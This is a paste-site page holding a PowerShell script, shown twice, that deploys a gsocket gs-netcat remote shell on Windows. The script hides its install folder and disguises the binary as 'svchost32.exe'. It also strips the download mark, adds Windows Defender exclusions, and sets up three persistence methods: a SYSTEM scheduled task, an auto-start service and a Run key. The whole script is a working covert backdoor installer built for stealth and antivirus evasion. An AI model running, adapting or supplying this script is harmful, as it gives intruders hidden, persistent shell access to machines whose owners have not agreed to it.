Untitled 1803

Guest

May 5th, 2026

Never

Not a member of GistPad yet? Sign Up, it unlocks many cool features!

None 18.60 KB | None | 0 0

copy raw download clone embed print report

# deploy-gsocket.ps1
# Compatible: Windows 7/8/10/11, Server 2008R2+
# Requires: Run as Administrator
param(
[string]$MachineSecret = "REPLACE_WITH_UNIQUE_SECRET",
[string]$TaskName = "WindowsNetworkService",
[string]$InstallDir = "C:\ProgramData\Microsoft\Network\Connections"
)
# ── Elevate if not admin ───────────────────────────────────────────────────────
if (-not ([Security.Principal.WindowsPrincipal] `
[Security.Principal.WindowsIdentity]::GetCurrent() `
).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`" -MachineSecret `"$MachineSecret`"" -Verb RunAs
exit
}
# ── Helpers ────────────────────────────────────────────────────────────────────
function Log($msg) { Write-Host "[*] $msg" }
function Err($msg) { Write-Host "[!] $msg" -ForegroundColor Red }
# ── Detect architecture ────────────────────────────────────────────────────────
$arch = if ([Environment]::Is64BitOperatingSystem) { "win64" } else { "win32" }
Log "Architecture: $arch"
# ── Detect OS version for compatibility ───────────────────────────────────────
$osVersion = [System.Environment]::OSVersion.Version
$isWin7 = ($osVersion.Major -eq 6 -and $osVersion.Minor -eq 1)
Log "OS Version: $($osVersion.ToString())"
# ── Create install dir (hidden) ────────────────────────────────────────────────
New-Item -ItemType Directory -Force -Path $InstallDir | Out-Null
(Get-Item $InstallDir -Force).Attributes = "Hidden,System"
Log "Install dir: $InstallDir"
# ── Download binary with multiple fallback methods ─────────────────────────────
$BinaryPath = "$InstallDir\svchost32.exe" # blend into system look
$DownloadUrl = "https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_$arch.exe";
function Download-File($url, $dest) {
# Method 1: Invoke-WebRequest (PS 3.0+)
try {
[Net.ServicePointManager]::SecurityProtocol = `
[Net.SecurityProtocolType]::Tls12 -bor `
[Net.SecurityProtocolType]::Tls11 -bor `
[Net.SecurityProtocolType]::Tls
Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing -TimeoutSec 30
if (Test-Path $dest) { return $true }
} catch { Log "IWR failed, trying WebClient..." }
# Method 2: .NET WebClient (Win7 compatible)
try {
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $dest)
if (Test-Path $dest) { return $true }
} catch { Log "WebClient failed, trying BITS..." }
# Method 3: BITS (Background Intelligent Transfer)
try {
Start-BitsTransfer -Source $url -Destination $dest -ErrorAction Stop
if (Test-Path $dest) { return $true }
} catch { Log "BITS failed, trying curl..." }
# Method 4: curl.exe (Win10 1803+)
try {
$curlPath = "$env:SystemRoot\System32\curl.exe"
if (Test-Path $curlPath) {
& $curlPath -L -o $dest --tlsv1.2 --silent $url
if (Test-Path $dest) { return $true }
}
} catch { Log "curl failed..." }
return $false
}
if (-not (Test-Path $BinaryPath)) {
Log "Downloading gsocket binary..."
if (-not (Download-File $DownloadUrl $BinaryPath)) {
Err "All download methods failed. Exiting."
exit 1
}
}
Log "Binary ready: $BinaryPath"
# ── Unblock binary (removes Mark-of-the-Web) ──────────────────────────────────
try { Unblock-File -Path $BinaryPath -ErrorAction SilentlyContinue } catch {}
# ── Exclude from Windows Defender ─────────────────────────────────────────────
try {
Add-MpPreference -ExclusionPath $InstallDir -ErrorAction SilentlyContinue
Add-MpPreference -ExclusionProcess $BinaryPath -ErrorAction SilentlyContinue
Log "AV exclusion added"
} catch { Log "Could not add AV exclusion (non-fatal)" }
# ── Create resilient launcher batch ───────────────────────────────────────────
$LauncherPath = "$InstallDir\launcher.bat"
$LauncherContent = @"
@echo off
setlocal
set GSOCKET_ARGS=-s $MachineSecret -l -i -k
:loop
"$BinaryPath" %GSOCKET_ARGS%
timeout /t 10 /nobreak >nul 2>&1
ping -n 11 127.0.0.1 >nul 2>&1
goto loop
"@
Set-Content -Path $LauncherPath -Value $LauncherContent -Encoding ASCII
# ── Install persistence (3 methods for maximum resilience) ────────────────────
# Method A: Scheduled Task (most reliable, survives reboots + logoffs)
function Install-ScheduledTask {
try {
$Action = New-ScheduledTaskAction -Execute "cmd.exe" `
-Argument "/c `"$LauncherPath`""
$Trigger1 = New-ScheduledTaskTrigger -AtStartup
$Trigger2 = New-ScheduledTaskTrigger -RepetitionInterval (New-TimeSpan -Minutes 5) `
-Once -At (Get-Date)
$Settings = New-ScheduledTaskSettingsSet `
-ExecutionTimeLimit ([TimeSpan]::Zero) `
-RestartCount 99 `
-RestartInterval (New-TimeSpan -Minutes 1) `
-StartWhenAvailable `
-RunOnlyIfNetworkAvailable:$false
Register-ScheduledTask -TaskName $TaskName `
-Action $Action -Trigger @($Trigger1, $Trigger2) `
-RunLevel Highest -User "SYSTEM" `
-Settings $Settings -Force | Out-Null
Start-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
Log "Scheduled Task installed"
return $true
} catch {
# Fallback for older PowerShell / Windows 7
try {
schtasks /create /tn $TaskName /sc onstart /delay 0001:00 `
/tr "cmd.exe /c `"$LauncherPath`"" `
/ru SYSTEM /f | Out-Null
schtasks /run /tn $TaskName | Out-Null
Log "Scheduled Task installed (legacy schtasks)"
return $true
} catch {
Err "Scheduled Task failed"
return $false
}
}
}
# Method B: Windows Service via sc.exe
function Install-Service {
try {
$SvcName = "WinNetSvc"
$SvcPath = "$InstallDir\service_wrapper.bat"
# Wrap in a simple loop for service mode
Set-Content $SvcPath "@echo off`n:l`n`"$BinaryPath`" -s $MachineSecret -l -i -k`ntimeout /t 10 >nul`ngoto l" -Encoding ASCII
sc.exe create $SvcName binPath= "cmd.exe /c `"$SvcPath`"" start= auto | Out-Null
sc.exe failure $SvcName reset= 60 actions= restart/5000/restart/5000/restart/5000 | Out-Null
sc.exe start $SvcName | Out-Null
Log "Windows Service installed"
return $true
} catch {
Err "Service install failed (non-fatal)"
return $false
}
}
# Method C: Registry Run key (last resort, user-session only)
function Install-RegistryRun {
try {
$regPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Set-ItemProperty -Path $regPath -Name $TaskName `
-Value "cmd.exe /c `"$LauncherPath`"" -ErrorAction Stop
Log "Registry Run key installed"
return $true
} catch {
Err "Registry Run key failed"
return $false
}
}
# Try all persistence methods
Install-ScheduledTask
Install-Service
Install-RegistryRun
# ── Immediately start in background ───────────────────────────────────────────
try {
Start-Process -FilePath "cmd.exe" `
-ArgumentList "/c `"$LauncherPath`"" `
-WindowStyle Hidden -ErrorAction SilentlyContinue
Log "Started background process"
} catch {}
# ── Verify it's running ────────────────────────────────────────────────────────
Start-Sleep -Seconds 3
$running = Get-Process | Where-Object { $_.Path -eq $BinaryPath } | Select-Object -First 1
if ($running) {
Log "Verified: gsocket is running (PID $($running.Id))"
} else {
Err "Process not detected — may still be starting"
}
Log "Deployment complete. Secret: $MachineSecret"

RAW Paste Data Copied

# deploy-gsocket.ps1
# Compatible: Windows 7/8/10/11, Server 2008R2+
# Requires: Run as Administrator
 
param(
    [string]$MachineSecret = "REPLACE_WITH_UNIQUE_SECRET",
    [string]$TaskName      = "WindowsNetworkService",
    [string]$InstallDir    = "C:\ProgramData\Microsoft\Network\Connections"
)
 
# ── Elevate if not admin ───────────────────────────────────────────────────────
if (-not ([Security.Principal.WindowsPrincipal] `
    [Security.Principal.WindowsIdentity]::GetCurrent() `
    ).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`" -MachineSecret `"$MachineSecret`"" -Verb RunAs
    exit
}
 
# ── Helpers ────────────────────────────────────────────────────────────────────
function Log($msg) { Write-Host "[*] $msg" }
function Err($msg) { Write-Host "[!] $msg" -ForegroundColor Red }
 
# ── Detect architecture ────────────────────────────────────────────────────────
$arch = if ([Environment]::Is64BitOperatingSystem) { "win64" } else { "win32" }
Log "Architecture: $arch"
 
# ── Detect OS version for compatibility ───────────────────────────────────────
$osVersion = [System.Environment]::OSVersion.Version
$isWin7    = ($osVersion.Major -eq 6 -and $osVersion.Minor -eq 1)
Log "OS Version: $($osVersion.ToString())"
 
# ── Create install dir (hidden) ────────────────────────────────────────────────
New-Item -ItemType Directory -Force -Path $InstallDir | Out-Null
(Get-Item $InstallDir -Force).Attributes = "Hidden,System"
Log "Install dir: $InstallDir"
 
# ── Download binary with multiple fallback methods ─────────────────────────────
$BinaryPath = "$InstallDir\svchost32.exe"  # blend into system look
$DownloadUrl = "https://github.com/hackerschoice/gsocket/releases/latest/download/gs-netcat_$arch.exe"
 
function Download-File($url, $dest) {
    # Method 1: Invoke-WebRequest (PS 3.0+)
    try {
        [Net.ServicePointManager]::SecurityProtocol = `
            [Net.SecurityProtocolType]::Tls12 -bor `
            [Net.SecurityProtocolType]::Tls11 -bor `
            [Net.SecurityProtocolType]::Tls
        Invoke-WebRequest -Uri $url -OutFile $dest -UseBasicParsing -TimeoutSec 30
        if (Test-Path $dest) { return $true }
    } catch { Log "IWR failed, trying WebClient..." }
 
    # Method 2: .NET WebClient (Win7 compatible)
    try {
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $dest)
        if (Test-Path $dest) { return $true }
    } catch { Log "WebClient failed, trying BITS..." }
 
    # Method 3: BITS (Background Intelligent Transfer)
    try {
        Start-BitsTransfer -Source $url -Destination $dest -ErrorAction Stop
        if (Test-Path $dest) { return $true }
    } catch { Log "BITS failed, trying curl..." }
 
    # Method 4: curl.exe (Win10 1803+)
    try {
        $curlPath = "$env:SystemRoot\System32\curl.exe"
        if (Test-Path $curlPath) {
            & $curlPath -L -o $dest --tlsv1.2 --silent $url
            if (Test-Path $dest) { return $true }
        }
    } catch { Log "curl failed..." }
 
    return $false
}
 
if (-not (Test-Path $BinaryPath)) {
    Log "Downloading gsocket binary..."
    if (-not (Download-File $DownloadUrl $BinaryPath)) {
        Err "All download methods failed. Exiting."
        exit 1
    }
}
Log "Binary ready: $BinaryPath"
 
# ── Unblock binary (removes Mark-of-the-Web) ──────────────────────────────────
try { Unblock-File -Path $BinaryPath -ErrorAction SilentlyContinue } catch {}
 
# ── Exclude from Windows Defender ─────────────────────────────────────────────
try {
    Add-MpPreference -ExclusionPath $InstallDir -ErrorAction SilentlyContinue
    Add-MpPreference -ExclusionProcess $BinaryPath -ErrorAction SilentlyContinue
    Log "AV exclusion added"
} catch { Log "Could not add AV exclusion (non-fatal)" }
 
# ── Create resilient launcher batch ───────────────────────────────────────────
$LauncherPath = "$InstallDir\launcher.bat"
$LauncherContent = @"
@echo off
setlocal
set GSOCKET_ARGS=-s $MachineSecret -l -i -k
:loop
"$BinaryPath" %GSOCKET_ARGS%
timeout /t 10 /nobreak >nul 2>&1
ping -n 11 127.0.0.1 >nul 2>&1
goto loop
"@
Set-Content -Path $LauncherPath -Value $LauncherContent -Encoding ASCII
 
# ── Install persistence (3 methods for maximum resilience) ────────────────────
 
# Method A: Scheduled Task (most reliable, survives reboots + logoffs)
function Install-ScheduledTask {
    try {
        $Action   = New-ScheduledTaskAction -Execute "cmd.exe" `
                      -Argument "/c `"$LauncherPath`""
        $Trigger1 = New-ScheduledTaskTrigger -AtStartup
        $Trigger2 = New-ScheduledTaskTrigger -RepetitionInterval (New-TimeSpan -Minutes 5) `
                      -Once -At (Get-Date)
        $Settings = New-ScheduledTaskSettingsSet `
                      -ExecutionTimeLimit ([TimeSpan]::Zero) `
                      -RestartCount 99 `
                      -RestartInterval (New-TimeSpan -Minutes 1) `
                      -StartWhenAvailable `
                      -RunOnlyIfNetworkAvailable:$false
        Register-ScheduledTask -TaskName $TaskName `
            -Action $Action -Trigger @($Trigger1, $Trigger2) `
            -RunLevel Highest -User "SYSTEM" `
            -Settings $Settings -Force | Out-Null
        Start-ScheduledTask -TaskName $TaskName -ErrorAction SilentlyContinue
        Log "Scheduled Task installed"
        return $true
    } catch {
        # Fallback for older PowerShell / Windows 7
        try {
            schtasks /create /tn $TaskName /sc onstart /delay 0001:00 `
                /tr "cmd.exe /c `"$LauncherPath`"" `
                /ru SYSTEM /f | Out-Null
            schtasks /run /tn $TaskName | Out-Null
            Log "Scheduled Task installed (legacy schtasks)"
            return $true
        } catch {
            Err "Scheduled Task failed"
            return $false
        }
    }
}
 
# Method B: Windows Service via sc.exe
function Install-Service {
    try {
        $SvcName  = "WinNetSvc"
        $SvcPath  = "$InstallDir\service_wrapper.bat"
        # Wrap in a simple loop for service mode
        Set-Content $SvcPath "@echo off`n:l`n`"$BinaryPath`" -s $MachineSecret -l -i -k`ntimeout /t 10 >nul`ngoto l" -Encoding ASCII
        sc.exe create $SvcName binPath= "cmd.exe /c `"$SvcPath`"" start= auto | Out-Null
        sc.exe failure $SvcName reset= 60 actions= restart/5000/restart/5000/restart/5000 | Out-Null
        sc.exe start $SvcName | Out-Null
        Log "Windows Service installed"
        return $true
    } catch {
        Err "Service install failed (non-fatal)"
        return $false
    }
}
 
# Method C: Registry Run key (last resort, user-session only)
function Install-RegistryRun {
    try {
        $regPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        Set-ItemProperty -Path $regPath -Name $TaskName `
            -Value "cmd.exe /c `"$LauncherPath`"" -ErrorAction Stop
        Log "Registry Run key installed"
        return $true
    } catch {
        Err "Registry Run key failed"
        return $false
    }
}
 
# Try all persistence methods
Install-ScheduledTask
Install-Service
Install-RegistryRun
 
# ── Immediately start in background ───────────────────────────────────────────
try {
    Start-Process -FilePath "cmd.exe" `
        -ArgumentList "/c `"$LauncherPath`"" `
        -WindowStyle Hidden -ErrorAction SilentlyContinue
    Log "Started background process"
} catch {}
 
# ── Verify it's running ────────────────────────────────────────────────────────
Start-Sleep -Seconds 3
$running = Get-Process | Where-Object { $_.Path -eq $BinaryPath } | Select-Object -First 1
if ($running) {
    Log "Verified: gsocket is running (PID $($running.Id))"
} else {
    Err "Process not detected — may still be starting"
}
 
Log "Deployment complete. Secret: $MachineSecret"